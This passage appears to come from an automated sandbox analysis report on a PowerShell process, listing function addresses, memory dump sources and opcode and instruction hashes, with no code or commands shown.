                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd345d0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e85e17a61f06bac2073d74c74b90d2a31741e7449c56a13b5c52d5e32824625f
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1584b9e1550824cced0fb529bd95794395ef4e074beebe622b8a57674ce9b9e0
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e85e17a61f06bac2073d74c74b90d2a31741e7449c56a13b5c52d5e32824625f
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C310332F1FA8A0FE7A6A71C64F157836D2EF87310B5902BAD50DC7292DD2DAC4192C1
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD3430C1D4 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 01816ad405c4d676332631710277f17d4b2fd4cd401c6850404c9474fbea8a1b
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 595cd59ee7e35cd1fea56ad8a8908e7278466ce0c2b8a943d5b494f5bcccc829
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01816ad405c4d676332631710277f17d4b2fd4cd401c6850404c9474fbea8a1b
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9310D30A5854D8EFBB8AF54DC65BF93294FF43315F400239D50EC7492CA7D6985DA11
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD341DE658 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2523701505.00007FFD341DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341DD000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd341dd000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7034df65e8887706b25c543dc7389838c4124c46861ba765a6ddf56c96d7407e
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3abfa791da259b5d3cf7f856e6d615361daf9b64079988ef68c1781bcf59e9da
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7034df65e8887706b25c543dc7389838c4124c46861ba765a6ddf56c96d7407e
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF2153A691FFC58FD753973448655257FB0AF13244B5A44EBC089CF0E3E61CA809C712
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD342F4E85 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 65b8cd58e2fbc73111a21f00f71e18b0012d52f2414405a9f44e957a971631e0
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7e07cadf4c819efa1e7e1bc8b009d57d342a57d33aa4d71250b0355db3957909
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65b8cd58e2fbc73111a21f00f71e18b0012d52f2414405a9f44e957a971631e0
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7101A73120CB0C8FD744EF4CE091AA5B3E0FB99320F50052DE58AC3691D636E881CB41
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD343069C0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ac03a25b94e4a377afbb356bc84827a3a65c6d8714546b2647b3bc611583387e
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 07741c497b5d9133a7df37594f9f863de812e377ed4ed9a0a12176578daee78b
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac03a25b94e4a377afbb356bc84827a3a65c6d8714546b2647b3bc611583387e
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2F0E9308546498FDB05EF2888455E97BA0FB26310F010297E459C71B2EB34E555CBD1

                                                                                                                                                                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD3430275D Relevance: 22.1, Strings: 17, Instructions: 826COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID: k4$0k4$0k4$8k4$8k4$@k4$Pk4$Xk4$Xk4$Xk4$`k4$hk4$xk4$xk4$k4$k4$k4
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1307145308
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fc60d90e0d7f632d8d88766e2f9229ca9c88ba90fc0e327ada4196f39ed06172
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 30fc944bb475ecdc7fd5ee147ef66c8c0979e49b4aeadd22a22a6d3aef0dd014
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc60d90e0d7f632d8d88766e2f9229ca9c88ba90fc0e327ada4196f39ed06172
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0642E843B4FAC10BE7665F6C68A51786F80EB9361075806FBD5CDD71DBE828EC0A9381
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD342F91D8 Relevance: 1.9, Strings: 1, Instructions: 613COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID: }\]
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-3066667218
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4a81381181e6194ec66e958a2cc51f6b9485a23359fd558d08737176bbeae710
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f8d1f60a636eb7a0c52e38a024f0fe59132715d385dddc48ce407e028e6f7da3
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a81381181e6194ec66e958a2cc51f6b9485a23359fd558d08737176bbeae710
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6816C5BE0D7C25FE363466D58B60E67FA4AF13264B4A00F7C688DB0D3DD1E28069762
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD342F2EFA Relevance: 1.7, Strings: 1, Instructions: 453COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID: 0NM4
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-3473425034
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ee6a014c8f52888a53f803c107fe52554dc263bf9acb88f2b3224699b241e746
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b18df3cc95b305b79f08ede9adb075e1ded093b5006d531bdb7ea7c40694b65b
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee6a014c8f52888a53f803c107fe52554dc263bf9acb88f2b3224699b241e746
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3FE1D531A08A4D8FDB95DF5CC4A5AE97BE1FF6A300F54017AD409E7296CE29E841C781
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD342FC606 Relevance: 1.6, Strings: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID: ^K|
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-4016767100
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 925127bdae8538971edb53e0a0e4b6cd508846d669b92fa65b7cc34eef7d1f7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bd029b022493e45581d2c780a4089e5b37041d3ff161ba4ed204d1370e66532b
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 925127bdae8538971edb53e0a0e4b6cd508846d669b92fa65b7cc34eef7d1f7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EA1E417A0E7C25FE713A67D58F61E63FE4AF53224B4900F7C288DA093DD1D280A9362
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD342FF7FA Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID: ^
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1590793086
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5cda1ea09207f03d0bb24b68a02e14cec188c13870b5b834281b1b56fa11c459
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: db7de686acc38f0f75429d9776970f71b959b462e11345452d89be10d32a6a24
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cda1ea09207f03d0bb24b68a02e14cec188c13870b5b834281b1b56fa11c459
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9351875BB0D7C15FE753962928B60E93FA0DF53264B9A40F7CA84DE093EE0E18079752
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD345D8533 Relevance: 1.0, Instructions: 1041COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2536987965.00007FFD345D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345D0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd345d0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 681fe07ba530c4268cdee6eae39de063dbe204993c30db93bdba8340a0c7981f
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 09e6f58a3568bbd7291707db87f840663f0faef7491090a5d6981a918c7bbeaa
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 681fe07ba530c4268cdee6eae39de063dbe204993c30db93bdba8340a0c7981f
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A620262A0FAC54FDB579B3C88A59643FE1EF27310B1900EBD199CB1A3D91DAC46C352
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD345B654F Relevance: .8, Instructions: 794COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2536652426.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd345b0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 828b609274490f195dbd5fc05779917493e0bd14cf251517033d1f7da907bdf0
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fe22242e311fc3a02c70c7114970f0779aa6cab8db0192f2af0e77bb3ae3635f
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 828b609274490f195dbd5fc05779917493e0bd14cf251517033d1f7da907bdf0
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A32E422A0EAC54FDF578A2888B59643FE1EF67310B1941FAC589CB0E3D959E846C342
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD345B7433 Relevance: .8, Instructions: 791COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2536652426.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd345b0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9d2b71ba23f3f124dfbe4c907da805814a3945613bd997bbb2c32cec7b3dc0b7
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bd521551912e3fc27e56ccb5375e2bd112264a14bf56ba12fd3037d73aa072e5
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d2b71ba23f3f124dfbe4c907da805814a3945613bd997bbb2c32cec7b3dc0b7
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C632E521E0EAC64FEB579A2888A49643FD1EF67310B1941FAC189CB2D3DD5DEC46D381
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD342F27FC Relevance: .4, Instructions: 437COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1991ae31316e35b2d4cab9767c124893d540734053066a7535f56be8bae73dfe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bc4816939b5bb3b576376517555c0c6705df33e505b9c9ecc63de6459ae65ec1
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1991ae31316e35b2d4cab9767c124893d540734053066a7535f56be8bae73dfe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38E1C61BB0E7D65AE723A63C68F21E63FA4EF5322574D01F7C6C4DA093DD0E24069262
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD342FF950 Relevance: .4, Instructions: 429COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0bbd5dd28bd32f16de352787e99e812bf39fbc08708a03ef40d8cfb30be86fbc
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6b4182b1ca14d870b59d922cc7b4801a4481ed13b019ed20fdf7596303ed63d1
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bbd5dd28bd32f16de352787e99e812bf39fbc08708a03ef40d8cfb30be86fbc
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3D1A31BB0D6D65BE762A76C68F60EA3BE0DF5332870901B7C684CA0D3ED1D68479352
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD342F925D Relevance: .4, Instructions: 372COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0b717c1d42ec95832b63bfb8ac6752a01559273c319db95b6aec038182fe2539
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8d8aa1bc2560b3f0b74169b990f82e2bd03ea0c39bd0f2e013f4126089672f9a
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b717c1d42ec95832b63bfb8ac6752a01559273c319db95b6aec038182fe2539
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C515A6BE0D7C25FE353466A1CB60A57FA4EF2326474A10F7C684DB0D3DD0E28066B66
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD342FFE50 Relevance: .4, Instructions: 353COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cfb6a51267b8d9d124ae5dd353c5188db3392885f4f98e0cadf2d13e05af8f7e
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b78aff6d3c08539a7da4a81a71b2fa68c3786ec92ec58c88490ff8371ee4655b
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfb6a51267b8d9d124ae5dd353c5188db3392885f4f98e0cadf2d13e05af8f7e
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FB1A11BB0D6D65AE762A76C68F60EA3FE0DF4333970901B7C694CE0D3AD1D68079252
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD342FF3D5 Relevance: .3, Instructions: 346COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2c34354c1e6e76022e5ee222b2243eac28219a8062a8a6d2b2bee5303777e52d
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7b72430315125807065b6d86d38c509360f243d20208cc2949ab69bd4b62ac13
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c34354c1e6e76022e5ee222b2243eac28219a8062a8a6d2b2bee5303777e52d
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E41505BB0D7D24EE362862D58F60DA3FA0EF5326474A00F7C6C1DA0A39D1E24079792
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD342FB80D Relevance: .3, Instructions: 267COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
